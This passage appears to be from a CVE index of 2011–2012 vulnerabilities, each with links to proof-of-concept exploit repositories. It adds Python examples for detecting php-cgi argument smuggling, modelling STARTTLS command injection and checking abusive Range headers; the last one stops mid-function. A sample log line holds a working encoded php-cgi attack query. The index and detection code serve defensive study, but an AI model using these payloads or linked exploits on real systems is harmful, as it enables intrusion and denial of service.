The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."

- [RobertoLeonFR-ES/Exploit-Win32.CVE-2012-0158.F.doc](https://github.com/RobertoLeonFR-ES/Exploit-Win32.CVE-2012-0158.F.doc)
- [Sunqiz/CVE-2012-0158-reproduction](https://github.com/Sunqiz/CVE-2012-0158-reproduction)

### CVE-2012-1495 (2020-01-27)

install/index.php in WebCalendar before 1.2.5 allows remote attackers to execute arbitrary code via the form_single_user_login parameter.

- [axelbankole/CVE-2012-1495-Webcalendar-](https://github.com/axelbankole/CVE-2012-1495-Webcalendar-)

### CVE-2012-1675 (2012-05-08)

The TNS Listener, as used in Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5, as used in Oracle Fusion Middleware, Enterprise Manager, E-Business Suite, and possibly other products, allows remote attackers to execute arbitrary database commands by performing a remote registration of a database (1) instance or (2) service name that already exists, then conducting a man-in-the-middle (MITM) attack to hijack database connections, aka "TNS Poison."

- [bongbongco/CVE-2012-1675](https://github.com/bongbongco/CVE-2012-1675)

### CVE-2012-1723 (2012-06-16)

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.

- [EthanNJC/CVE-2012-1723](https://github.com/EthanNJC/CVE-2012-1723)

### CVE-2012-1823 (2012-05-11)

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

- [drone789/CVE-2012-1823](https://github.com/drone789/CVE-2012-1823)
- [tardummy01/oscp_scripts-1](https://github.com/tardummy01/oscp_scripts-1)
- [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2)
- [cyberharsh/PHP_CVE-2012-1823](https://github.com/cyberharsh/PHP_CVE-2012-1823)
- [0xl0k1/CVE-2012-1823](https://github.com/0xl0k1/CVE-2012-1823)
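
The description above turns on one rule of the CGI specification: RFC 3875 section 4.4 says a QUERY_STRING with no unencoded `=` is an "indexed" search query, which the server splits on `+`, URL-decodes word by word and passes to the script as command-line arguments. For php-cgi those arguments are interpreted as interpreter switches (`-d` to set an ini directive, `-s` to dump source). The following is an added example, not code from the page or from any of the repositories listed here: it implements that argv derivation and runs it as a detection over a few constructed Apache log lines. The log lines, the `/cgi-bin/php` path and the `PHP_CGI_SWITCHES` tuple are assumptions for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# php-cgi switches that matter here (see `php-cgi -h`): -d sets an ini directive,
# -s prints highlighted source, -n skips php.ini, -c points at another php.ini,
# -f runs a given file. Assumed subset, chosen for this example.
PHP_CGI_SWITCHES = ("-d", "-s", "-n", "-c", "-f")

def cgi_argv_from_query(query_string: str) -> list:
    """RFC 3875 section 4.4: a QUERY_STRING with no unencoded '=' is an 'indexed'
    query; the server splits it on '+', URL-decodes each word and hands the words
    to the script as command-line arguments. A query containing '=' yields none.
    Decoding happens per word, so '%2dd' becomes '-d': filtering the raw query
    string for a leading '-' is not enough."""
    if "=" in query_string:
        return []
    return [unquote(word) for word in query_string.split("+") if word]

def smuggled_switches(query_string: str) -> list:
    """The php-cgi switches a request would inject via argv, e.g. ['-d', '-d']."""
    return [a for a in cgi_argv_from_query(query_string) if a.startswith(PHP_CGI_SWITCHES)]

# Apache combined log format, request field only.
_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def flag_php_cgi_requests(log_lines):
    """Return (line, switches) for log entries whose query string would reach a CGI
    binary as switches. Targets without a query string are skipped."""
    hits = []
    for line in log_lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        switches = smuggled_switches(query)
        if switches:
            hits.append((line, switches))
    return hits

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/May/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/May/2012:10:01:09 +0000] "GET /index.php?-s HTTP/1.1" 200 2048',
    '203.0.113.9 - - [05/May/2012:10:02:30 +0000] "POST /cgi-bin/php?%2dd+allow_url_include%3don+%2dd+auto_prepend_file%3dphp://input HTTP/1.1" 200 99',
    '203.0.113.9 - - [05/May/2012:10:03:00 +0000] "GET /search.php?q=php+-s HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line, switches in flag_php_cgi_requests(SAMPLE_LOG):
        print(switches, line)
```

The fourth sample line is the important negative case: `q=php+-s` contains an unencoded `=`, so no argv is built and the `-s` is harmless. The third line shows why the exploit encodes `=` as `%3d` and `-` as `%2d`: the server still decodes each word before it becomes an argument.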

### CVE-2012-1870 (2012-07-10)

The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability."

- [dja2TaqkGEEfA45/CVE-2012-1870](https://github.com/dja2TaqkGEEfA45/CVE-2012-1870)

### CVE-2012-1876 (2012-06-12)

Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.

- [WizardVan/CVE-2012-1876](https://github.com/WizardVan/CVE-2012-1876)
- [ExploitCN/CVE-2012-1876-win7_x86_and_win7x64](https://github.com/ExploitCN/CVE-2012-1876-win7_x86_and_win7x64)

### CVE-2012-1889 (2012-06-13)

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

- [whu-enjoy/CVE-2012-1889](https://github.com/whu-enjoy/CVE-2012-1889)
- [l-iberty/cve-2012-1889](https://github.com/l-iberty/cve-2012-1889)

### CVE-2012-2122 (2012-06-26)

sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.

- [Avinza/CVE-2012-2122-scanner](https://github.com/Avinza/CVE-2012-2122-scanner)
- [cyberharsh/Oracle-mysql-CVE-2012-2122](https://github.com/cyberharsh/Oracle-mysql-CVE-2012-2122)
- [zhangkaibin0921/CVE-2012-2122](https://github.com/zhangkaibin0921/CVE-2012-2122)

### CVE-2012-2593 (2020-02-06)

Cross-site scripting (XSS) vulnerability in the administrative interface in Atmail Webmail Server 6.4 allows remote attackers to inject arbitrary web script or HTML via the Date field of an email.

- [AndrewTrube/CVE-2012-2593](https://github.com/AndrewTrube/CVE-2012-2593)

### CVE-2012-2661 (2012-06-22)

The Active Record component in Ruby on Rails 3.0.x before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage unintended recursion, a related issue to CVE-2012-2695.

- [r4x0r1337/-CVE-2012-2661-ActiveRecord-SQL-injection-](https://github.com/r4x0r1337/-CVE-2012-2661-ActiveRecord-SQL-injection-)

### CVE-2012-2688 (2012-07-20)

Unspecified vulnerability in the _php_stream_scandir function in the stream implementation in PHP before 5.3.15 and 5.4.x before 5.4.5 has unknown impact and remote attack vectors, related to an "overflow."

- [shelld3v/CVE-2012-2688](https://github.com/shelld3v/CVE-2012-2688)

### CVE-2012-2982 (2012-09-11)

file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.

- [cd6629/CVE-2012-2982-Python-PoC](https://github.com/cd6629/CVE-2012-2982-Python-PoC)
- [OstojaOfficial/CVE-2012-2982](https://github.com/OstojaOfficial/CVE-2012-2982)
- [AlexJS6/CVE-2012-2982_Python](https://github.com/AlexJS6/CVE-2012-2982_Python)
- [Ari-Weinberg/CVE-2012-2982](https://github.com/Ari-Weinberg/CVE-2012-2982)
- [JohnHammond/CVE-2012-2982](https://github.com/JohnHammond/CVE-2012-2982)
- [R00tendo/CVE-2012-2982](https://github.com/R00tendo/CVE-2012-2982)
- [blu3ming/CVE-2012-2982](https://github.com/blu3ming/CVE-2012-2982)
- [0xF331-D3AD/CVE-2012-2982](https://github.com/0xF331-D3AD/CVE-2012-2982)
- [0xTas/CVE-2012-2982](https://github.com/0xTas/CVE-2012-2982)
- [LeDucKhiem/CVE-2012-2982](https://github.com/LeDucKhiem/CVE-2012-2982)
- [CpyRe/CVE-2012-2982](https://github.com/CpyRe/CVE-2012-2982)
- [Shadow-Spinner/CVE-2012-2982_python](https://github.com/Shadow-Spinner/CVE-2012-2982_python)
- [elliotosama/CVE-2012-2982](https://github.com/elliotosama/CVE-2012-2982)

### CVE-2012-3137 (2012-09-21)

The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to obtain the session key and salt for arbitrary users, which leaks information about the cryptographic hash and makes it easier to conduct brute force password guessing attacks, aka "stealth password cracking vulnerability."

- [hantwister/o5logon-fetch](https://github.com/hantwister/o5logon-fetch)
- [r1-/cve-2012-3137](https://github.com/r1-/cve-2012-3137)

### CVE-2012-3153 (2012-10-16)

Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.

- [Mekanismen/pwnacle-fusion](https://github.com/Mekanismen/pwnacle-fusion)

### CVE-2012-3716 (2012-09-20)

CoreText in Apple Mac OS X 10.7.x before 10.7.5 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write or read) via a crafted text glyph.

- [d4rkcat/killosx](https://github.com/d4rkcat/killosx)

### CVE-2012-4220 (2012-11-30)

diagchar_core.c in the Qualcomm Innovation Center (QuIC) Diagnostics (aka DIAG) kernel-mode driver for Android 2.3 through 4.2 allows attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference) via an application that uses crafted arguments in a local diagchar_ioctl call.

- [hiikezoe/diaggetroot](https://github.com/hiikezoe/diaggetroot)
- [poliva/root-zte-open](https://github.com/poliva/root-zte-open)

### CVE-2012-4431 (2012-12-19)

org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.

- [imjdl/CVE-2012-4431](https://github.com/imjdl/CVE-2012-4431)

### CVE-2012-4681 (2012-08-28)

Multiple vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allow remote attackers to execute arbitrary code via a crafted applet that bypasses SecurityManager restrictions by (1) using com.sun.beans.finder.ClassFinder.findClass and leveraging an exception with the forName method to access restricted classes from arbitrary packages such as sun.awt.SunToolkit, then (2) using "reflection with a trusted immediate caller" to leverage the getField method to access and modify private fields, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.

- [benjholla/CVE-2012-4681-Armoring](https://github.com/benjholla/CVE-2012-4681-Armoring)
- [ZH3FENG/PoCs-CVE_2012_4681](https://github.com/ZH3FENG/PoCs-CVE_2012_4681)

### CVE-2012-4792 (2012-12-30)

Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.

- [WizardVan/CVE-2012-4792](https://github.com/WizardVan/CVE-2012-4792)

### CVE-2012-4869 (2012-09-06)

The callme_startcall function in recordings/misc/callme_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

- [bitc0de/Elastix-Remote-Code-Execution](https://github.com/bitc0de/Elastix-Remote-Code-Execution)
- [0xConstant/CVE-2012-4869](https://github.com/0xConstant/CVE-2012-4869)

### CVE-2012-4929 (2012-09-15)

The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.

- [mpgn/CRIME-poc](https://github.com/mpgn/CRIME-poc)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)

### CVE-2012-5106 (2014-06-20)

Stack-based buffer overflow in FreeFloat FTP Server 1.0 allows remote authenticated users to execute arbitrary code via a long string in a PUT command.

- [war4uthor/CVE-2012-5106](https://github.com/war4uthor/CVE-2012-5106)

### CVE-2012-5321 (2012-10-08)

tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection."

- [Cappricio-Securities/CVE-2012-5321](https://github.com/Cappricio-Securities/CVE-2012-5321)

### CVE-2012-5519 (2012-11-20)

CUPS 1.4.4, when running in certain Linux distributions such as Debian GNU/Linux, stores the web interface administrator key in /var/run/cups/certs/0 using certain permissions, which allows local users in the lpadmin group to read or write arbitrary files as root by leveraging the web interface.

- [p1ckzi/CVE-2012-5519](https://github.com/p1ckzi/CVE-2012-5519)

### CVE-2012-5575 (2013-08-19)

Apache CXF 2.5.x before 2.5.10, 2.6.x before CXF 2.6.7, and 2.7.x before CXF 2.7.4 does not verify that a specified cryptographic algorithm is allowed by the WS-SecurityPolicy AlgorithmSuite definition before decrypting, which allows remote attackers to force CXF to use weaker cryptographic algorithms than intended and makes it easier to decrypt communications, aka "XML Encryption backwards compatibility attack."

- [tafamace/CVE-2012-5575](https://github.com/tafamace/CVE-2012-5575)

### CVE-2012-5613 (2012-12-03)

MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.

- [Hood3dRob1n/MySQL-Fu.rb](https://github.com/Hood3dRob1n/MySQL-Fu.rb)
- [w4fz5uck5/UDFPwn-CVE-2012-5613](https://github.com/w4fz5uck5/UDFPwn-CVE-2012-5613)

### CVE-2012-5664
- [phusion/rails-cve-2012-5664-test](https://github.com/phusion/rails-cve-2012-5664-test)

### CVE-2012-5958 (2013-01-31)

Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.

- [lochiiconnectivity/vulnupnp](https://github.com/lochiiconnectivity/vulnupnp)

### CVE-2012-5960 (2013-01-31)

Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.

- [finn79426/CVE-2012-5960-PoC](https://github.com/finn79426/CVE-2012-5960-PoC)

### CVE-2012-6066 (2012-12-04)

freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to bypass authentication via a crafted session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.

- [bongbongco/CVE-2012-6066](https://github.com/bongbongco/CVE-2012-6066)

### CVE-2012-6636 (2014-03-03)

The Android API before 17 does not properly restrict the WebView.addJavascriptInterface method, which allows remote attackers to execute arbitrary methods of Java objects by using the Java Reflection API within crafted JavaScript code that is loaded into the WebView component in an application targeted to API level 16 or earlier, a related issue to CVE-2013-4710.

- [xckevin/AndroidWebviewInjectDemo](https://github.com/xckevin/AndroidWebviewInjectDemo)
- [Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability](https://github.com/Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability)

## 2011
### CVE-2011-0104 (2011-04-13)

Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability."

- [Sunqiz/CVE-2011-0104-reproduction](https://github.com/Sunqiz/CVE-2011-0104-reproduction)

### CVE-2011-0228 (2011-08-29)

The Data Security component in Apple iOS before 4.2.10 and 4.3.x before 4.3.5 does not check the basicConstraints parameter during validation of X.509 certificate chains, which allows man-in-the-middle attackers to spoof an SSL server by using a non-CA certificate to sign a certificate for an arbitrary domain.

- [jan0/isslfix](https://github.com/jan0/isslfix)

### CVE-2011-1237 (2011-04-13)

Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability."

- [BrunoPujos/CVE-2011-1237](https://github.com/BrunoPujos/CVE-2011-1237)

### CVE-2011-1249 (2011-06-16)

The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."

- [Madusanka99/OHTS](https://github.com/Madusanka99/OHTS)
- [h3xcr4ck3r/CVE-2011-1249](https://github.com/h3xcr4ck3r/CVE-2011-1249)

### CVE-2011-1473 (2012-06-16)

OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment.

- [zjt674449039/cve-2011-1473](https://github.com/zjt674449039/cve-2011-1473)
- [XDLDCG/bash-tls-reneg-attack](https://github.com/XDLDCG/bash-tls-reneg-attack)

### CVE-2011-1475 (2011-04-08)

The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."

- [samaujs/CVE-2011-1475](https://github.com/samaujs/CVE-2011-1475)

### CVE-2011-1485 (2011-05-31)

Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.

- [Pashkela/CVE-2011-1485](https://github.com/Pashkela/CVE-2011-1485)

### CVE-2011-1571 (2011-05-07)

Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.

- [noobpk/CVE-2011-1571](https://github.com/noobpk/CVE-2011-1571)

### CVE-2011-1575 (2011-05-23)

The STARTTLS implementation in ftp_parser.c in Pure-FTPd before 1.0.30 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted FTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

- [masamoon/cve-2011-1575-poc](https://github.com/masamoon/cve-2011-1575-poc)
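
The mechanism described above is not specific to Pure-FTPd: any server that reads the control channel through one buffer and then switches that buffer to TLS will execute whatever plaintext was already queued behind the STARTTLS command, attributing it to the now-encrypted peer. The following is an added model of that reader, not code from the page or from the listed repository; the command names, the `flush_on_starttls` switch and the injected `USER attacker` lines are assumptions made for this example.

```python
class StartTlsControlChannel:
    """Model of a text-protocol server (FTP 'AUTH TLS', SMTP/IMAP 'STARTTLS') that reads
    commands through a single input buffer. Commands that arrived in the clear but were
    still buffered when TLS came up are the injection vector: the server runs them
    believing they came from the TLS-protected peer."""

    STARTTLS = "AUTH TLS"

    def __init__(self, flush_on_starttls: bool):
        self.flush_on_starttls = flush_on_starttls   # True models the fix
        self.buffer = b""
        self.tls_active = False
        self.executed = []   # (command, server believed it arrived over TLS)

    def recv(self, segment: bytes):
        """One read from the socket; dispatches every complete line now buffered."""
        self.buffer += segment
        while b"\r\n" in self.buffer:
            line, _, self.buffer = self.buffer.partition(b"\r\n")
            self._dispatch(line.decode("ascii", "replace"))

    def _dispatch(self, command: str):
        self.executed.append((command, self.tls_active))
        if command.upper() == self.STARTTLS:
            # The TLS handshake would run here; afterwards reads come from the TLS layer.
            self.tls_active = True
            if self.flush_on_starttls:
                # Fix: bytes read before the handshake are plaintext and may come from an
                # on-path attacker, so they must not survive into the TLS session. Some
                # servers go further and treat such pipelined data as a protocol error.
                self.buffer = b""

def injection_scenario(flush_on_starttls: bool):
    """An on-path attacker appends 'USER attacker' and 'PASS hunter2' to the client's
    plaintext AUTH TLS segment; afterwards the real client logs in over TLS."""
    server = StartTlsControlChannel(flush_on_starttls)
    server.recv(b"AUTH TLS\r\nUSER attacker\r\nPASS hunter2\r\n")   # one TCP segment
    server.recv(b"USER alice\r\n")                                 # now over TLS
    return server.executed
```

With `flush_on_starttls=False` the injected `USER`/`PASS` pair is executed with `tls_active=True`, i.e. the server believes the attacker's credentials were supplied by the client inside the TLS session; with the flush in place only the client's own `USER alice` runs after the handshake.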

### CVE-2011-1720 (2011-05-13)

The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method.

- [nbeguier/postfix_exploit](https://github.com/nbeguier/postfix_exploit)

### CVE-2011-1974 (2011-08-10)

NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability."

- [hittlle/CVE-2011-1974-PoC](https://github.com/hittlle/CVE-2011-1974-PoC)

### CVE-2011-2461 (2011-12-01)

Cross-site scripting (XSS) vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains.

- [ikkisoft/ParrotNG](https://github.com/ikkisoft/ParrotNG)
- [u-maxx/magento-swf-patched-CVE-2011-2461](https://github.com/u-maxx/magento-swf-patched-CVE-2011-2461)
- [edmondscommerce/CVE-2011-2461_Magento_Patch](https://github.com/edmondscommerce/CVE-2011-2461_Magento_Patch)

### CVE-2011-2523 (2019-11-27)

vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

- [HerculesRD/vsftpd2.3.4PyExploit](https://github.com/HerculesRD/vsftpd2.3.4PyExploit)
- [nobodyatall648/CVE-2011-2523](https://github.com/nobodyatall648/CVE-2011-2523)
- [Gr4ykt/CVE-2011-2523](https://github.com/Gr4ykt/CVE-2011-2523)
- [padsalatushal/CVE-2011-2523](https://github.com/padsalatushal/CVE-2011-2523)
- [MFernstrom/OffensivePascal-CVE-2011-2523](https://github.com/MFernstrom/OffensivePascal-CVE-2011-2523)
- [0xSojalSec/-CVE-2011-2523](https://github.com/0xSojalSec/-CVE-2011-2523)
- [0xSojalSec/CVE-2011-2523](https://github.com/0xSojalSec/CVE-2011-2523)
- [XiangSi-Howard/CTF---CVE-2011-2523](https://github.com/XiangSi-Howard/CTF---CVE-2011-2523)
- [cowsecurity/CVE-2011-2523](https://github.com/cowsecurity/CVE-2011-2523)
- [Lynk4/CVE-2011-2523](https://github.com/Lynk4/CVE-2011-2523)
- [vaishnavucv/CVE-2011-2523](https://github.com/vaishnavucv/CVE-2011-2523)
- [chleba124/vsftpd-exploit](https://github.com/chleba124/vsftpd-exploit)
- [4m3rr0r/CVE-2011-2523-poc](https://github.com/4m3rr0r/CVE-2011-2523-poc)
- [Shubham-2k1/Exploit-CVE-2011-2523](https://github.com/Shubham-2k1/Exploit-CVE-2011-2523)
- [Tenor-Z/SmileySploit](https://github.com/Tenor-Z/SmileySploit)
- [R4idB0Y/CVE-2011-2523-PoC](https://github.com/R4idB0Y/CVE-2011-2523-PoC)
- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)
- [Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit](https://github.com/Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit)
- [everythingBlackkk/vsFTPd-Backdoor-Exploit-CVE-2011-2523-](https://github.com/everythingBlackkk/vsFTPd-Backdoor-Exploit-CVE-2011-2523-)

### CVE-2011-2894 (2011-10-04)

Spring Framework 3.0.0 through 3.0.5, Spring Security 3.0.0 through 3.0.5 and 2.0.0 through 2.0.6, and possibly other versions deserialize objects from untrusted sources, which allows remote attackers to bypass intended security restrictions and execute untrusted code by (1) serializing a java.lang.Proxy instance and using InvocationHandler, or (2) accessing internal AOP interfaces, as demonstrated using deserialization of a DefaultListableBeanFactory instance to execute arbitrary commands via the java.lang.Runtime class.

- [pwntester/SpringBreaker](https://github.com/pwntester/SpringBreaker)

### CVE-2011-3026 (2012-02-16)

Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation.

- [argp/cve-2011-3026-firefox](https://github.com/argp/cve-2011-3026-firefox)

### CVE-2011-3192 (2011-08-29)

The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.

- [tkisason/KillApachePy](https://github.com/tkisason/KillApachePy)
- [limkokholefork/CVE-2011-3192](https://github.com/limkokholefork/CVE-2011-3192)
- [stcmjp/cve-2011-3192](https://github.com/stcmjp/cve-2011-3192)
- [futurezayka/CVE-2011-3192](https://github.com/futurezayka/CVE-2011-3192)
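
The header used in the wild had the shape `Range: bytes=0-,5-0,5-1,...,5-1299`: one full-resource range followed by hundreds of overlapping ranges, each of which the byterange filter buffered separately. The following is an added example, not code from the page or from the listed repositories: a byte-range parser that measures how much output such a header makes a naive server buffer, and a check in the spirit of the interim advice to refuse requests with more than five ranges. The `max_ranges` default and the sample content length are assumptions for illustration.

```python
import re

_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_byte_ranges(header: str, content_length: int):
    """Turn 'bytes=a-b,c-d,...' into concrete (first, last) pairs the way a server
    does before assembling a multipart/byteranges response. Unsatisfiable ranges
    are dropped; a malformed header returns None (serve the full resource)."""
    if not header.lower().startswith("bytes="):
        return None
    ranges = []
    for spec in header[len("bytes="):].split(","):
        m = _SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first, last = m.group(1), m.group(2)
        if first == "":                                  # suffix form '-N': last N bytes
            n = int(last)
            if n == 0:
                continue
            ranges.append((max(content_length - n, 0), content_length - 1))
            continue
        start = int(first)
        end = content_length - 1 if last == "" else min(int(last), content_length - 1)
        if start <= end:
            ranges.append((start, end))
    return ranges

def bytes_buffered(ranges) -> int:
    """Total payload a naive server buffers: one copy of every range, overlaps included."""
    return sum(last - first + 1 for first, last in ranges)

def is_abusive_range_request(header: str, content_length: int, max_ranges: int = 5) -> bool:
    """Refuse (or answer with a plain 200) any request carrying more than a handful of
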